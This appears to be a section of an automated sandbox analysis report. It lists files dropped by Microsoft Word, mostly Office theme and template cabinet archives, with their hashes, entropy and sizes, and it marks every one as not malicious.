                                    SHA-256:AE0C5A2C8377DBA613C576B1FF73F01AE8EF4A3A4A10B078B5752FB712B3776C
                                    SHA-512:075A9E95C6EC7E358EA8942CF55EFB72AC797DEE1F1FFCD27AD60472ED38A76048D356638EF6EAC22106F94AFEE9D543B502D5E80B964471FA7419D288867D5D
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 4410 bytes, 2 files, at 0x44 "PictureFrame.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):20554
                                    Entropy (8bit):7.612044504501488
                                    Encrypted:false
                                    SSDEEP:384:zEAH676iPi8+IS5iqn7G8E0GftpBjExDxIHFLrHRN7Ke/ll7PK/pGaz6:zEhG8+ISrG8Pi6xDxCKoIGaz6
                                    MD5:486CBCB223B873132FFAF4B8AD0AD044
                                    SHA1:B0EC82CD986C2AB5A51C577644DE32CFE9B12F92
                                    SHA-256:B217393FD2F95A11E2C594E736067870212E3C5242A212D6F9539450E8684616
                                    SHA-512:69A48BF2B1DB64348C63FC0A50B4807FB9F0175215E306E60252FFFD792B1300128E8E847A81A0E24757B5F999875DA9E662C0F0D178071DB4F9E78239109060
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 5647 bytes, 2 files, at 0x44 "RadialPictureList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):21791
                                    Entropy (8bit):7.65837691872985
                                    Encrypted:false
                                    SSDEEP:384:PWew5RNDcvPgbA8E0GftpBjE0hsyaFLrHRN7BD9lI66YR:P3GRNDcEA8Pi60hsyABDo66g
                                    MD5:7BF88B3CA20EB71ED453A3361908E010
                                    SHA1:F75F86557051160507397F653D7768836E3B5655
                                    SHA-256:E555A610A61DB4F45A29A7FB196A9726C25772594252AD534453E69F05345283
                                    SHA-512:2C3DFB0F8913D1D8FF95A55E1A1FD58CE1F9D034268CD7BC0D2BF2DCEFEA8EF05DD62B9AFDE1F983CACADD0529538381632ADFE7195EAC19CE4143414C44DBE3
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 6450 bytes, 2 files, at 0x44 "ThemePictureAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):22594
                                    Entropy (8bit):7.674816892242868
                                    Encrypted:false
                                    SSDEEP:384:L7d2l8FbHaaIKbtv1gDISi8E0GftpBjEZRFLrHRN74bUll7PK/pd:LUlCIOt/8Pi6Zv4bMId
                                    MD5:EE0129C7CC1AC92BBC3D6CB0F653FCAE
                                    SHA1:4ABAA858176B349BDAB826A7C5F9F00AC5499580
                                    SHA-256:345AA5CA2496F975B7E33C182D5E57377F8B740F23E9A55F4B2B446723947B72
                                    SHA-512:CDDABE701C8CBA5BD5D131ABB85F9241212967CE6924E34B9D78D6F43D76A8DE017E28302FF13CE800456AD6D1B5B8FFD8891A66E5BE0C1E74CF19DF9A7AD959
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 252241 bytes, 2 files, at 0x44 +A "content.inf" +A "Frame.thmx", flags 0x4, ID 34169, number 1, extra bytes 20 in head, 16 datablocks, 0x1503 compression
                                    Category:dropped
                                    Size (bytes):271273
                                    Entropy (8bit):7.995547668305345
                                    Encrypted:true
                                    SSDEEP:6144:zfdvQnJMwXse4Vradf3mrC7woyWbjKlCVC7K:zfJwJse4VrS1AK
                                    MD5:21437897C9B88AC2CB2BB2FEF922D191
                                    SHA1:0CAD3D026AF2270013F67E43CB44F0568013162D
                                    SHA-256:372572DCBAD590F64F5D18727757CBDF9366DDE90955C79A0FCC9F536DAB0384
                                    SHA-512:A74DA3775C19A7AF4A689FA4D920E416AB9F40A8BDA82CCF651DDB3EACBC5E932A120ABF55F855474CEBED0B0082F45D091E211AAEA6460424BFD23C2A445CC7
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 206792 bytes, 2 files, at 0x44 +A "content.inf" +A "View.thmx", flags 0x4, ID 33885, number 1, extra bytes 20 in head, 15 datablocks, 0x1503 compression
                                    Category:dropped
                                    Size (bytes):222992
                                    Entropy (8bit):7.994458910952451
                                    Encrypted:true
                                    SSDEEP:6144:k8/c2cF9GTLqsTmYstUdx+dwb2ooiVOfiI17zWbQ:jbzqGdpbZ/Mf3h68
                                    MD5:26BEAB9CCEAFE4FBF0B7C0362681A9D2
                                    SHA1:F63DD970040CA9F6CFCF5793FF7D4F1F4A69C601
                                    SHA-256:217EC1B6E00A24583B166026DEC480D447FB564CF3BCA81984684648C272F767
                                    SHA-512:2BBEA62360E21E179014045EE95C7B330A086014F582439903F960375CA7E9C0CF5C0D5BB24E94279362965CA9D6A37E6AAA6A7C5969FC1970F6C50876582BE1
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 279287 bytes, 2 files, at 0x44 +A "Basis.thmx" +A "content.inf", flags 0x4, ID 55632, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                    Category:dropped
                                    Size (bytes):295527
                                    Entropy (8bit):7.996203550147553
                                    Encrypted:true
                                    SSDEEP:6144:nwVaEqsf23c9shf6UyOGgDWDn/p3fd+zkPWnvGL3n9bQnkmVheyqtkl:MlPfW6sVEDn/pPdhWnvGL36zyyqal
                                    MD5:9A07035EF802BF89F6ED254D0DB02AB0
                                    SHA1:9A48C1962B5CF1EE37FEEC861A5B51CE11091E78
                                    SHA-256:6CB03CEBAB2C28BF5318B13EEEE49FBED8DCEDAF771DE78126D1BFE9BD81C674
                                    SHA-512:BE13D6D88C68FA16390B04130838D69CDB6169DC16AF0E198C905B22C25B345C541F8FCCD4690D88BE89383C19943B34EDC67793F5EB90A97CD6F6ECCB757F87
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 243642 bytes, 2 files, at 0x44 +A "content.inf" +A "Metropolitan.thmx", flags 0x4, ID 19054, number 1, extra bytes 20 in head, 24 datablocks, 0x1503 compression
                                    Category:dropped
                                    Size (bytes):261258
                                    Entropy (8bit):7.99541965268665
                                    Encrypted:true
                                    SSDEEP:6144:9blShNYrHNn0JU+D+kh8CIjXHWC7X0nZLC9Ge2KY/WfI:9ZSTYrtn0Sk+CIDHWC7chVKYx
                                    MD5:65828DC7BE8BA1CE61AD7142252ACC54
                                    SHA1:538B186EAF960A076474A64F508B6C47B7699DD3
                                    SHA-256:849E2E915AA61E2F831E54F337A745A5946467D539CCBD0214B4742F4E7E94FF
                                    SHA-512:8C129F26F77B4E73BF02DE8F9A9F432BB7E632EE4ABAD560A331C2A12DA9EF5840D737BFC1CE24FDCBB7EF39F30F98A00DD17F42C51216F37D0D237145B8DE15
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 259074 bytes, 2 files, at 0x44 +A "content.inf" +A "Dividend.thmx", flags 0x4, ID 58359, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                    Category:dropped
                                    Size (bytes):276650
                                    Entropy (8bit):7.995561338730199
                                    Encrypted:true
                                    SSDEEP:6144:H2a+HFkDF8gpmMt4kzwVVqhSYO6DITxPWgJl1CFExwXyo7N:mlZgFtIVVTuDExeWuv7N
                                    MD5:84D8F3848E7424CBE3801F9570E05018
                                    SHA1:71D7F2621DA8B295CE6885F8C7C81016D583C6B1
                                    SHA-256:B4BC3CD34BD328AAF68289CC0ED4D5CF8167F1EE1D7BE20232ED4747FF96A80A
                                    SHA-512:E27873BFD95E464CB58B3855F2DA404858B935530CF74C7F86FF8B3FC3086C2FAEA09FA479F0CA7B04D87595ED8C4D07D104426FF92DFB31BED405FA7A017DA8
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 291188 bytes, 2 files, at 0x44 +A "Banded.thmx" +A "content.inf", flags 0x4, ID 56338, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                    Category:dropped
                                    Size (bytes):307348
                                    Entropy (8bit):7.996451393909308
                                    Encrypted:true
                                    SSDEEP:6144:7vH3uG+yiWx0eVJyORloyyDqnHefzOs81MrXLXx7:b36yiWH/LRS2CJl1
                                    MD5:0EBC45AA0E67CC435D0745438371F948
                                    SHA1:5584210C4A8B04F9C78F703734387391D6B5B347
                                    SHA-256:3744BFA286CFCFF46E51E6A68823A23F55416CD6619156B5929FED1F7778F1C7
                                    SHA-512:31761037C723C515C1A9A404E235FE0B412222CB239B86162D17763565D0CCB010397376FB9B61B38A6AEBDD5E6857FD8383045F924AF8A83F2C9B9AF6B81407
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 214772 bytes, 2 files, at 0x44 +A "content.inf" +A "Parcel.thmx", flags 0x4, ID 26500, number 1, extra bytes 20 in head, 19 datablocks, 0x1503 compression
                                    Category:dropped
                                    Size (bytes):230916
                                    Entropy (8bit):7.994759087207758
                                    Encrypted:true
                                    SSDEEP:6144:OTIPtMXmJWnzPS3pqnkeuJXW+FNx1a72rLiQxEBTR:750nz63/FJRFLISnp+Bt
                                    MD5:93FA9F779520AB2D22AC4EA864B7BB34
                                    SHA1:D1E9F53A0E012A89978A3C9DED73FB1D380A9D8A
                                    SHA-256:6A3801C1D4CF0C19A990282D93AC16007F6CACB645F0E0684EF2EDAC02647833
                                    SHA-512:AA91B4565C88E5DA0CF294DC4A2C91EAEB6D81DCA96069DB032412E1946212A13C3580F5C0143DD28B33F4849D2C2DF2214CE1E20598D634E78663D20F03C4E6
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 533290 bytes, 2 files, at 0x44 +A "content.inf" +A "Parallax.thmx", flags 0x4, ID 64081, number 1, extra bytes 20 in head, 29 datablocks, 0x1503 compression
                                    Category:dropped
                                    Size (bytes):550906
                                    Entropy (8bit):7.998289614787931
                                    Encrypted:true
                                    SSDEEP:12288:N4Ar9NyDhUQM0Hk86V1YnOIxQ9e6SJbj2OjK:jAG8wa5Qw6SZ2Oj
                                    MD5:1C12315C862A745A647DAD546EB4267E
                                    SHA1:B3FA11A511A634EEC92B051D04F8C1F0E84B3FD6
                                    SHA-256:4E2E93EBAC4AD3F8690B020040D1AE3F8E7905AB7286FC25671E07AA0282CAC0
                                    SHA-512:CA8916694D42BAC0AD38B453849958E524E9EED2343EBAA10DF7A8ACD13DF5977F91A4F2773F1E57900EF044CFA7AF8A94B3E2DCE734D7A467DBB192408BC240
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 624532 bytes, 2 files, at 0x44 +A "content.inf" +A "Quotable.thmx", flags 0x4, ID 13510, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
                                    Category:dropped
                                    Size (bytes):640684
                                    Entropy (8bit):7.99860205353102
                                    Encrypted:true
                                    SSDEEP:12288:eV7ivfl+kbkIrWu+2aoRjwv/cSUWauGPo2v65s4QqcT3ZCCz6CSj8aC:fdhr1+3y4MWaC2CO4V+3ZCCDsO
                                    MD5:F93364EEC6C4FFA5768DE545A2C34F07
                                    SHA1:166398552F6B7F4509732E148F93E207DD60420B
                                    SHA-256:296B915148B29751E68687AE37D3FAFD9FFDDF458C48EB059A964D8F2291E899
                                    SHA-512:4F0965B4C5F543B857D9A44C7A125DDD3E8B74837A0FDD80C1FDC841BF22FC4CE4ADB83ACA8AA65A64F8AE6D764FA7B45B58556F44CFCE92BFAC43762A3BC5F4
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 704319 bytes, 2 files, at 0x44 +A "content.inf" +A "Wood_Type.thmx", flags 0x4, ID 5778, number 1, extra bytes 20 in head, 51 datablocks, 0x1503 compression
                                    Category:dropped
                                    Size (bytes):723359
                                    Entropy (8bit):7.997550445816903
                                    Encrypted:true
                                    SSDEEP:12288:NPnBZX7wR3tMwYqNDQGnXTtfzO5U7yo6O7bLhe8yE3LLDok4a:JBMbYE7xzO5U917bLh/DL3oJa
                                    MD5:748A53C6BDD5CE97BD54A76C7A334286
                                    SHA1:7DD9EEDB13AC187E375AD70F0622518662C61D9F
                                    SHA-256:9AF92B1671772E8E781B58217DAB481F0AFBCF646DE36BC1BFFC7D411D14E351
                                    SHA-512:EC8601D1A0DBD5D79C67AF2E90FAD44BBC0B890412842BF69065A2C7CB16C12B1C5FF594135C7B67B830779645801DA20C9BE8D629B6AD8A3BA656E0598F0540
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 682092 bytes, 2 files, at 0x44 +A "Berlin.thmx" +A "content.inf", flags 0x4, ID 46672, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
                                    Category:dropped
                                    Size (bytes):698244
                                    Entropy (8bit):7.997838239368002
                                    Encrypted:true
                                    SSDEEP:12288:bUfKzAwwP7XAMWtr4FvMRt4lX0hnBdThiSb32+TdysrQgn7v4EemC6:sr7AMkJ34xu1bm4ZrQaY6
                                    MD5:E29CE2663A56A1444EAA3732FFB82940
                                    SHA1:767A14B51BE74D443B5A3FEFF4D870C61CB76501
                                    SHA-256:3732EB6166945DB2BF792DA04199B5C4A0FB3C96621ECBFDEAF2EA1699BA88EE
                                    SHA-512:6BC420F3A69E03D01A955570DC0656C83C9E842C99CF7B429122E612E1E54875C61063843D8A24DB7EC2035626F02DDABF6D84FC3902184C1EFF3583DBB4D3D8
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 1049713 bytes, 2 files, at 0x44 +A "content.inf" +A "Savon.thmx", flags 0x4, ID 60609, number 1, extra bytes 20 in head, 37 datablocks, 0x1503 compression
                                    Category:dropped
                                    Size (bytes):1065873
                                    Entropy (8bit):7.998277814657051
                                    Encrypted:true
                                    SSDEEP:24576:qehtHA3nsAOx7yN7THwxdGpkw8R60aTcua5U4c:hhmnsBMNAxdGpV5za5Uv
                                    MD5:E1101CCA6E3FEDB28B57AF4C41B50D37
                                    SHA1:990421B1D858B756E6695B004B26CDCCAE478C23
                                    SHA-256:69B2675E47917A9469F771D0C634BD62B2DFA0F5D4AF3FD7AFE9196BF889C19E
                                    SHA-512:B1EDEA65B6D0705A298BFF85FC894A11C1F86B43FAC3C2149D0BD4A13EDCD744AF337957CBC21A33AB7A948C11EA9F389F3A896B6B1423A504E7028C71300C44
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 937309 bytes, 2 files, at 0x44 +A "content.inf" +A "Gallery.thmx", flags 0x4, ID 44349, number 1, extra bytes 20 in head, 34 datablocks, 0x1503 compression
                                    Category:dropped
                                    Size (bytes):953453
                                    Entropy (8bit):7.99899040756787
                                    Encrypted:true
                                    SSDEEP:24576:9B1Onw3vg7aeYPagzbJ5Vhv6LnV2Dhl7GEYqVjcyd:vww3o7BYPJbJ5Vh6UCqZfd
                                    MD5:D4EAC009E9E7B64B8B001AE82B8102FA
                                    SHA1:D8D166494D5813DB20EA1231DA4B1F8A9B312119
                                    SHA-256:8B0631DA4DC79E036251379A0A68C3BA977F14BCC797BA0EB9692F8BB90DDB4D
                                    SHA-512:561653F9920661027D006E7DEF7FB27DE23B934E4860E0DF78C97D183B7CEBD9DCE0D395E2018EEF1C02FC6818A179A661E18A2C26C4180AFEE5EF4F9C9C6035
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 1291243 bytes, 2 files, at 0x44 +A "content.inf" +A "Droplet.thmx", flags 0x4, ID 47417, number 1, extra bytes 20 in head, 54 datablocks, 0x1503 compression
                                    Category:dropped
                                    Size (bytes):1310275
                                    Entropy (8bit):7.9985829899274385
                                    Encrypted:true
                                    SSDEEP:24576:NN3M9UHpHZE4aubaPubP3M6d71FdtmFAjq+54/79LVzG+VnS:NN3M9UJHZE4abPyU4JtmFCq+q/7JlVS
                                    MD5:9C9F49A47222C18025CC25575337A965
                                    SHA1:E42EDB33471D7C1752DCC42C06DD3F9FDA8B25F0
                                    SHA-256:ADA7EFF0676D9CCE1935D5485F3DDE35C594D343658FB1DA42CB5A48FC3FC16A
                                    SHA-512:9FDCBAB988CBE97BFD931B727D31BA6B8ECF795D0679A714B9AFBC2C26E7DCF529E7A51289C7A1AE7EF04F4A923C2D7966D5AF7C0BC766DCD0FCA90251576794
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 1081343 bytes, 2 files, at 0x44 +A "Circuit.thmx" +A "content.inf", flags 0x4, ID 11309, number 1, extra bytes 20 in head, 45 datablocks, 0x1503 compression
                                    Category:dropped
                                    Size (bytes):1097591
                                    Entropy (8bit):7.99825462915052
                                    Encrypted:true
                                    SSDEEP:24576:UE9BMy98gA4cDWHkSrDans3MfEE6w8OaVuCibol0j41dwD:UE9Bdy3D4keQWt7w85VuVoaj4/Q
                                    MD5:BF95E967E7D1CEC8EFE426BC0127D3DE
                                    SHA1:BA44C5500A36D748A9A60A23DB47116D37FD61BC
                                    SHA-256:4C3B008E0EB10A722D8FEDB325BFB97EDAA609B1E901295F224DD4CB4DF5FC26
                                    SHA-512:0697E394ABAC429B00C3A4F8DB9F509E5D45FF91F3C2AF2C2A330D465825F058778C06B129865B6107A0731762AD73777389BB0E319B53E6B28C363232FA2CE8
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 1750009 bytes, 2 files, at 0x44 +A "content.inf" +A "Slate.thmx", flags 0x4, ID 28969, number 1, extra bytes 20 in head, 72 datablocks, 0x1503 compression
                                    Category:dropped
                                    Size (bytes):1766185
                                    Entropy (8bit):7.9991290831091115
                                    Encrypted:true
                                    SSDEEP:24576:O/gjMj+RP9Q07h9F75a0BXjBccHMVk2Hq2SkGa0QglyZtxmdPP2LcSUtfgfp16Yx:kJ6RP9Q07/X5V7yVF0QgktxAPutUt0zP
                                    MD5:828F96031F40BF8EBCB5E52AAEEB7E4C
                                    SHA1:CACC32738A0A66C8FE51A81ED8E27A6F82E69EB2
                                    SHA-256:640AD075B555D4A2143F909EAFD91F54076F5DDE42A2B11CD897BC564B5D7FF7
                                    SHA-512:61F6355FF4D984931E79624394CCCA217054AE0F61B9AF1A1EDED5ACCA3D6FEF8940E338C313BE63FC766E6E7161CAFA0C8AE44AD4E0BE26C22FF17E2E6ABAF7
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 1865728 bytes, 2 files, at 0x44 +A "content.inf" +A "Damask.thmx", flags 0x4, ID 63852, number 1, extra bytes 20 in head, 68 datablocks, 0x1503 compression
                                    Category:dropped
                                    Size (bytes):1881952
                                    Entropy (8bit):7.999066394602922
                                    Encrypted:true
                                    SSDEEP:49152:6Wp9u/ZAvKz7ZFCejPiSmYXKIr6kBwBUA:6W6Bn7ZFNiiKo2l
                                    MD5:53C5F45B22E133B28D4BD3B5A350FDBD
                                    SHA1:D180CFB1438D27F76E1919DA3E84F307CB83434F
                                    SHA-256:8AF4C7CAC47D2B9C7ADEADF276EDAE830B4CC5FFE7E765E3C3D7B3FADCB5F273
                                    SHA-512:46AD3DA58C63CA62FCFC4FAF9A7B5B320F4898A1E84EEF4DE16E0C0843BAFE078982FC9F78C5AC6511740B35382400B5F7AC3AE99BB52E32AD9639437DB481D1
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 2573508 bytes, 2 files, at 0x44 +A "content.inf" +A "Mesh.thmx", flags 0x4, ID 62129, number 1, extra bytes 20 in head, 94 datablocks, 0x1503 compression
                                    Category:dropped
                                    Size (bytes):2591108
                                    Entropy (8bit):7.999030891647433
                                    Encrypted:true
                                    SSDEEP:49152:ZSBBeAefkpB5iXfQJgi7JBaCCRZ3cM2VDHkvSJO6qzI1tE9Rn:EBI6gbCkMPDHKSJO6qsP6n
                                    MD5:BEB12A0464D096CA33BAEA4352CE800F
                                    SHA1:F678D650B4A41676BA05C836D462F34BDC5BF648
                                    SHA-256:A44166F5C9F2553555A43586BA5DB1C1DE54D72D308A48268F27C6A00076B1CA
                                    SHA-512:B6E7CCD1ECBB9A49FC72E40771725825DAF41DDB2FF8EA4ECCE18B8FA1A59D3B2C474ADD055F30DA58C7E833A6E6555EBB77CCC324B61CA337187B4B41F7008B
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 2511552 bytes, 2 files, at 0x44 +A "content.inf" +A "Main_Event.thmx", flags 0x4, ID 59889, number 1, extra bytes 20 in head, 90 datablocks, 0x1503 compression
                                    Category:dropped
                                    Size (bytes):2527736
                                    Entropy (8bit):7.992272975565323
                                    Encrypted:true
                                    SSDEEP:49152:NFXdpz4d98p/q5jA4q+9Uf5kx6wHR8WfPJZVhWzH4dRze76YP9nJ7yyAInT76nSY:NFXdKx5sM9SmxHKexZVhutJJVpCSqa0Z
                                    MD5:F256ACA509B4C6C0144D278C7036B0A8
                                    SHA1:93F6106D0759AFD0061F73B876AA9CAB05AA8EF6
                                    SHA-256:AD26761D59F1FA9783C2F49184A2E8FE55FCD46CD3C49FFC099C02310649DC67
                                    SHA-512:08C57661F8CC9B547BBE42B4A5F8072B979E93346679ADE23CA685C0085F7BC14C26707B3D3C02F124359EBB640816E13763C7546FF095C96D2BB090320F3A95
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 3239239 bytes, 2 files, at 0x44 +A "content.inf" +A "Vapor_Trail.thmx", flags 0x4, ID 19811, number 1, extra bytes 20 in head, 111 datablocks, 0x1503 compression
                                    Category:dropped
                                    Size (bytes):3256855
                                    Entropy (8bit):7.996842935632312
                                    Encrypted:true
                                    SSDEEP:98304:wh7I1aeH9YvgK+A+a7GiiQzP4YZDpQ2+Sd6Y:w21ay93aypQzzhpBL/
                                    MD5:8867BDF5FC754DA9DA6F5BA341334595
                                    SHA1:5067CCE84C6C682B75C1EF3DEA067A8D58D80FA9
                                    SHA-256:42323DD1D3E88C3207E16E0C95CA1048F2E4CD66183AD23B90171DA381D37B58
                                    SHA-512:93421D7FE305D27E7E2FD8521A8B328063CD22FE4DE67CCCF5D3B8F0258EF28027195C53062D179CD2EBA3A7E6F6A34A7A29297D4AF57650AA6DD19D1EF8413D
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 3400898 bytes, 2 files, at 0x4c "Insight design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 106 datablocks, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):3417042
                                    Entropy (8bit):7.997652455069165
                                    Encrypted:true
                                    SSDEEP:98304:1YYkj2mRz6vkkB15AW4QD0ms+FdniD60bDUpS:qYkj7d6vP7NZDLn+PM8
                                    MD5:749C3615E54C8E6875518CFD84E5A1B2
                                    SHA1:64D51EB1156E850ECA706B00961C8B101F5AC2FC
                                    SHA-256:F2D2DF37366F8E49106980377D2448080879027C380D90D5A25DA3BDAD771F8C
                                    SHA-512:A5F591BA5C31513BD52BBFC5C6CAA79C036C7B50A55C4FDF96C84D311CCDCF1341F1665F1DA436D3744094280F98660481DCA4AA30BCEB3A7FCCB2A62412DC99
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):30
                                    Entropy (8bit):1.2389205950315936
                                    Encrypted:false
                                    SSDEEP:3:PpSh/t:Ah/
                                    MD5:175C41C40B5305D209E43D1F7A6D7639
                                    SHA1:3B1A9F5847ABAFD152ADB4C87FBE5434E125EF74
                                    SHA-256:1D3DA5A82B02CB6E1FF75F50EBF916CD9566EA254006DDE2EA947635668F0516
                                    SHA-512:2C518D8F68A2A2637D55D60B62E6539D3FBC1ACA2ABC061E2297EBCEB5C8A6E7DD764AF42008A93FC6978C1E984C0CE29787A7C8B900DF7ED34EDC630C13ED32
                                    Malicious:false
                                    Preview:.....L........................
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Dec 18 14:23:14 2024, mtime=Wed Dec 18 14:23:26 2024, atime=Wed Dec 18 14:23:14 2024, length=11302, window=hide
                                    Category:dropped
                                    Size (bytes):589
                                    Entropy (8bit):4.92218747978544
                                    Encrypted:false
                                    SSDEEP:6:4xtQl3988kSlWUZ076n2ChzwXIMtxmNJAaRaa5ZsFWjc2ChzwBRIWjc2Chzw2iQ/:8D8zXnTUSpanF/Tz/T0zhmV
                                    MD5:863DF5B96E47D4B298686D9BA13A41F1
                                    SHA1:CE2337E31ADE969F3DDCFFE93C52A0A11C116932
                                    SHA-256:DEA0168EF51F2583D31CE9570E2E6BF720239345297FD68898E50C1F7A989508
                                    SHA-512:5EB58825B9B59F231E6B342DA4426E36624FAD903A5E8183392AB08B49F4CE6956F96DCE699585A6A9DBC90A21677B6D6D9AF3AAC0FD3F16E313262384038F27
                                    Malicious:false
                                    Preview:L..................F.... ....1..`Q......`Q......`Q..&,......................f.d.2.&,...Y.z .9C7B~1.DOC..J......Y.z.Y.z...............................Q.y)R'Y<y.S..d.o.c.x...........$.......$...5...........Z................F.......C:\Users\user\Desktop\???????.docx.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.D.e.s.k.t.o.p.\..Q.y)R'Y<y.S..d.o.c.x.......#.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\..Q.y)R'Y<y.S..d.o.c.x.`.......X.......928100...........hT..CrF.f4... ..2=.b...,...W..hT..CrF.f4... ..2=.b...,...W..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Generic INItialization configuration [folders]
                                    Category:dropped
                                    Size (bytes):49
                                    Entropy (8bit):3.833016601078342
                                    Encrypted:false
                                    SSDEEP:3:HLRb6lm4Z8b6lv:HLRd0
                                    MD5:5225F92FC7C6204602FACAD1AFB9A0A2
                                    SHA1:1E04A8C70C9468DDB909077FF0226624CB35EDD9
                                    SHA-256:44D7281091105C2C6DFD80EB0E3291E5E0E1FC07E8F0F011AD83B37F3C0E9F9B
                                    SHA-512:14B51C5F0A4C68831243534869DDA3D839E5BF6C00AE18E4CA940D9251D65A911700B10899E8B7B9E1A80B6E85EA609DB36CAD7D5EAFF51EF261086B44950B33
                                    Malicious:false
                                    Preview:[misc]..???????.LNK=0..[folders]..???????.LNK=0..
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):562113
                                    Entropy (8bit):7.67409707491542
                                    Encrypted:false
                                    SSDEEP:12288:/dy5Gtyp/FZ9QqjdxDfSp424XeavSktiAVE0:/dizp1ndpqpMZnV
                                    MD5:4A1657A3872F9A77EC257F41B8F56B3D
                                    SHA1:4DDEA85C649A2C1408B5B08A15DEF49BAA608A0B
                                    SHA-256:C17103ADE455094E17AC182AD4B4B6A8C942FD3ACB381F9A5E34E3F8B416AE60
                                    SHA-512:7A2932639E06D79A5CE1D3C71091890D9E329CA60251E16AE4095E4A06C6428B4F86B7FFFA097BF3EEFA064370A4D51CA3DF8C89EAFA3B1F45384759DEC72922
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):1649585
                                    Entropy (8bit):7.875240099125746
                                    Encrypted:false
                                    SSDEEP:24576:L368X6z95zf5BbQ6U79dYy2HiTIxRboyM/LZTl5KnCc:r68kb7UTYxGIxmnp65
                                    MD5:35200E94CEB3BB7A8B34B4E93E039023
                                    SHA1:5BB55EDAA4CDF9D805E36C36FB092E451BDDB74D
                                    SHA-256:6CE04E8827ABAEA9B292048C5F84D824DE3CEFDB493101C2DB207BD4475AF1FD
                                    SHA-512:ED80CEE7C22D10664076BA7558A79485AA39BE80582CEC9A222621764DAE5EFA70F648F8E8C5C83B6FE31C2A9A933C814929782A964A47157505F4AE79A3E2F9
                                    Malicious:false
